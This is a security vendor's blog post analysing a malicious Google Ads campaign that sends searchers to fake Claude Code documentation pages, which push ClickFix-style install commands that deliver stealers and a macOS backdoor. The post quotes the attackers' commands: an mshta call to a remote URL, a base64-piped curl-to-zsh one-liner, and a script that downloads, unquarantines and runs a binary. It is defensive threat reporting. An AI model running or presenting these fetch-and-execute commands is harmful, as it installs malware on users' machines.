
Bitdefender’s security researchers have discovered a malicious Google Ads campaign that targets anyone looking for downloads related to Claude, the large language model developed by Anthropic.
Claude has been in the news for quite some time, and cybercriminals are capitalizing by anticipating people will be searching for tools and downloads related to this LLM.
To exploit this interest, they bought a convincing sponsored result that shows up above legitimate search results, redirecting victims to a fake documentation page that looks much like the real one.
Additionally, the attackers use one of the most basic tactics to compromise devices: a method called ClickFix, which tricks users into running terminal commands that actually install malware on Windows or macOS systems. This campaign has also been documented by our fellow researchers at PushSecurity.
First, attackers buy Google advertisements that appear when users search for things like “download claude code” and similar variants. The ad looks real and copies the official branding. Because Google marks it as a sponsored result, users likely assume it passed verification.
Secondly, the ad redirects users to a fake documentation page hosted on a Squarespace subdomain. The page copies the real Claude Code Docs layout, navigation structure and styling.
Nothing looks suspicious or out of place. The only element that doesn’t immediately match is the URL, but not everyone will double-check the URL. Even if they do, they see Squarespace, which is known.
Thirdly, the page presents installation instructions that change depending on the visitor’s OS. For example, Windows users see a command that leverages mshta.exe, a real Microsoft utility, to download and execute a remote payload.
On the other hand, macOS users will encounter a more complex terminal command that decodes Base64-encoded content, triggering a multi-stage infection chain.
Fourth, once the victim runs the command, the malware retrieves a secondary payload from the attacker-controlled infrastructure. On Windows, the payload includes a stealer detected as Trojan.Stealer.GJ and Trojan.Stealer.GK.
On macOS, the downloaded Mach-O binary installs a backdoor that can spawn /bin/bash or /bin/zsh, and enable remote command execution.
What makes this dangerous is that the attackers never exploit a software flaw. The entire infection relies on the victim’s willingness to follow instructions and fall for the ClickFix social engineering tactic.
Users search for something that looks like this:

Because Google labels it as a sponsored result and the branding looked authentic, users tend to trust it.
Instead of landing on Claude’s legitimate documentation, they reached this page instead:

The page closely mirrored the real documentation hosted at:
https://docs.claude.com/docs/en/overview
The fake page instructed people to install Claude Code using terminal commands for macOS and Windows. Anyone accustomed to developer tools could be tricked into copying and executing them without hesitation.
That moment triggered the infection chain.
Windows users received instructions to run this in PowerShell:
C:\Windows\SysWOW64\mshta.exe https://download.active-version[.]com/claude
Or Windows CMD:
C:\Windows\SysWOW64\mshta.exe https://download.active-version[.]com/claude
The command abuses mshta.exe, a legitimate Microsoft utility designed to execute HTML Applications (HTA files).
Once executed, the system downloaded a payload that contains an executable component and an HTA file.
Bitdefender detects these threats as:
The HTA file will recursively decrypt a memory-embedded Microsoft Intermediate Language (MSIL) payload that results in a shellcode at the latest stage.
The MSIL stagers run by the HTA are detected as another couple of Trojans:
macOS users see a different command that’s more complex and intentionally obfuscated.
Attackers convince the victims to run the following command:
echo "macOS Download: http://code.claude[.]ai/download/" && curl -sSfL $(echo ' <BASE_64_PAYLOAD> '|base64 -D)| zsh
This command decodes a Base64-encoded string and pipes the decoded output directly into zsh.
The second stage starts immediately.
#!/bin/zsh
tnyrzi=$(base64 -D <<'PAYLOAD_END' | gunzip
<BASE_64_PAYLOAD> PAYLOAD_END
)
eval "$tnyrzi"
The script decodes and decompresses embedded content, then executes it.
The decoded command reads:
#!/bin/zsh
curl -o /tmp/helper https://wriconsult[.]com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
The system retrieves a Mach-O binary from:
https://wriconsult[.]com/n8n/update
The script removes extended attributes, grants execution rights, and launches the binary.
No installer appears, and there’s no prompt to warn the user. The malware executes silently.
The macOS malware executes Anti-Sandbox/anti-VM checks similar to those of the AMOS stealer, a known macOS infostealer capable of harvesting credentials, browser data, and crypto-related information.
Analysis of the universal Mach-O binary shows that it acts like a backdoor or reverse shell.
The binary:
All of these behaviors are strong signs that the malware was built to allow remote access and control by attackers.
As you would expect, Google doesn’t let anyone post any type of ad, and there’s usually scrutiny. So attackers had to use a company account that already had this type of trust.
Our insights associate the campaign with a real Malaysian company. We believe that attackers compromised this advertiser's account to publish malicious ads. The advertiser’s account has since been deactivated by Google.
Is Claude Code malicious?
No. Attackers impersonated the brand. The legitimate software remains safe.
Does this affect both Windows and macOS?
Yes. The campaign deploys tailored malware for each platform.
What does the macOS malware do?
It installs a backdoor capable of spawning remote shells and executing attacker-controlled commands.
Why did Google show the malicious ad?
Attackers likely compromised a legitimate advertiser account, enabling the campaign to pass review systems.
tags
I'm a software engineer with a passion for cybersecurity & digital privacy.
View all postsSilviu is a seasoned writer who's been following the technology world for more than two decades, covering topics ranging from software to hardware and everything in between.
View all posts